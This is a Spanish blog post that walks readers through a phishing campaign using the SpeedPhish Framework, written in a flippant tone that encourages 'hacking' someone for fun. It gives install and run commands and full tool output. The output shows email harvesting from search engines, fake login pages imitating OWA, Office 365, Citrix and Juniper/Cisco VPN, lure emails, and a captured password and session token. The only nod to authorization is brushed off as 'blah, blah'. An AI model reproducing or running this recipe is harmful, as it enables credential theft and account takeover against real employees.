Realiza ataques de phishing en un santiamén con SPF (SpeedPhish Framework)

¿Estás en el chiringuito de playa y sientes la necesidad de juakear a algo o a alguien?, ¿sientes la llamada de la ingeniería social? ¿qué tal un phishing rápido?. Déjame decirte primero que estás enfermo... y luego hablarte de SPF (SpeedPhish Framework), una herramienta escrita en python diseñada para realizar un rápido reconocimiento y desarrollo de phishings. Así que levanta la tapa de tu netbook y empieza a teclear...

Requisitos & instalación

apt-get update
apt-get upgrade -y
apt-get install build-essential python-dev python-pip phantomjs -y
pip install dnspython
pip install twisted
git clone https://github.com/tatanus/SPF.git

Ejecución

cd spf
python spf.py --all -d dominio.com (si has configurado previamente la pasarela SMTP y no quieres mandar los correos a las víctimas usa mejor --test)

[!] A CONFIG FILE was not specified...  defaulting to [default.cfg]

/home/vmotos/SPF/spf/dominio.com/
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
/home/vmotos/SPF/spf/dominio.com/spf.sqlite

[*] Obtaining list of email targets
[*] [VERBOSE] Gathering emails via built-in methods
[*] [VERBOSE] Currently searching [google, bing, ask, dogpile, yandex, baidu, yahoo, duckduckgo]
[*] [VERBOSE] [Processing: /] Google
[*] [VERBOSE] [Processing: -] Bing
[*] [VERBOSE] [Processing: /] Ask
[*] [VERBOSE] [Processing: /] Dogpile
[*] [VERBOSE] [Processing: -] Yandex
[*] [VERBOSE] [Processing: /] Baidu
[*] [VERBOSE] [Processing: /] Yahoo
[*] [VERBOSE] [Processing: |] DuckDuckGo
[*] [VERBOSE] Gathered [14] email addresses from the Internet

[*] [VERBOSE] Gathering emails via theHarvester
[!] ERROR: theHarvester_path does not point to a valid file

[*] [VERBOSE] Collected [14] unique email addresses
[*] ----------
[*] EMAIL LIST
[*] ----------
[*] pepito@dominio.com
[*] datacenter@dominio.com
[*] I@dominio.com
[*] pedro.sanchez@dominio.com
[*] javier.martin@dominio.com
[*] prodriguez@dominio.com
[*] compania@dominio.com
[*] datacenter@dominio.com
[*] dalvarez@dominio.com
[*] jgarcia@dominio.com
[*] informatica@dominio.com
[*] lmartinez@dominio.com
[*] n@dominio.com
[*] resecionsas@dominio.com

[*] Starting phishing webserver
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] FIXED = [templates/web/owa]
[*] [VERBOSE] FIXED = [templates/web/office365]
[*] [VERBOSE] FIXED = [templates/web/cisco]
[*] [VERBOSE] FIXED = [templates/web/citrix]
[*] [VERBOSE] FIXED = [templates/web/citrix2]
[*] [VERBOSE] FIXED = [templates/web/juniper_vpn]
[*] [VERBOSE] Found the following web sites: [templates/web/owa/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/office365/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/cisco/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix2/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/juniper_vpn/CONFIG]
[*] [VERBOSE] Started website [cisco_vpn ] on [http://169.168.1.200:8000]
[*] [VERBOSE] Started website [citrix2   ] on [http://169.168.1.200:8001]
[*] [VERBOSE] Started website [junipervpn] on [http://169.168.1.200:8002]
[*] [VERBOSE] Started website [owa       ] on [http://169.168.1.200:8003]
[*] [VERBOSE] Started website [office365 ] on [http://169.168.1.200:8004]
[*] [VERBOSE] Started website [citrix    ] on [http://169.168.1.200:8005]
[*] [VERBOSE] Created VHOST [cisco_vpn.dominio.com ] -> [http://169.168.1.200:8000]
[*] [VERBOSE] Created VHOST [citrix2.dominio.com   ] -> [http://169.168.1.200:8001]
[*] [VERBOSE] Created VHOST [junipervpn.dominio.com] -> [http://169.168.1.200:8002]
[*] [VERBOSE] Created VHOST [owa.example.com       ] -> [http://169.168.1.200:8003]
[*] [VERBOSE] Created VHOST [office365.example.com ] -> [http://169.168.1.200:8004]
[*] [VERBOSE] Created VHOST [citrix.dominio.com    ] -> [http://169.168.1.200:8005]
[*] [VERBOSE] Started WebServer with pid = [5077]

[*] [VERBOSE] Locating phishing email templates
[*] [DEBUG]   Found the following email template: [templates/email/citrix.txt]
[*] [DEBUG]   Found the following email template: [templates/email/office365.txt]
[*] [DEBUG]   Found the following email template: [templates/email/dynamic.txt]
[*] [DEBUG]   Found the following email template: [templates/email/citrix2.txt]
[*] [DEBUG]   Found the following email template: [templates/email/owa.txt]

[*] Sending phishing emails
[*] [VERBOSE] Sending Email to [pepito@dominio.com]
[*] Would have sent an email to [pepito@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [I@dominio.com]
[*] Would have sent an email to [I@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [pedro.sanchez@dominio.com]
[*] Would have sent an email to [pedro.sanchez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [javier.martin@dominio.com]
[*] Would have sent an email to [javier.martin@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [prodriguez@dominio.com]
[*] Would have sent an email to [prodriguez@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [compania@dominio.com]
[*] Would have sent an email to [compania@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [dalvarez@dominio.com]
[*] Would have sent an email to [dalvarez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [jgarcia@dominio.com]
[*] Would have sent an email to [jgarcia@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [informatica@dominio.com]
[*] Would have sent an email to [informatica@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [lmanzanares@dominio.com]
[*] Would have sent an email to [lmanzanares@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [n@dominio.com]
[*] Would have sent an email to [n@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [resecionsas@dominio.com]
[*] Would have sent an email to [resecionsas@dominio.com] with subject of [Updated Citrix Server], but this was just a test.

[*] Monitoring phishing website activity!


Ahora ábrete otra cervezita y a esperar...


[*] (Press CTRL-C to stop collection and generate report!)
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],192.168.2.7
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],192.168.2.7,password=['prueba123'], user=['pepito@dominio.com'], LoginType=['Explicit'], SESSION_TOKEN=['05F56F0AD6F7D8CD25E08F2BB935866E']


¡Bingo!

pd. Ni que decir tiene que el phishing ha de hacerse tras previa autorización del dueño o responsable correspondiente del dominio y blah, blah,... ¡sed buenos!

Comentarios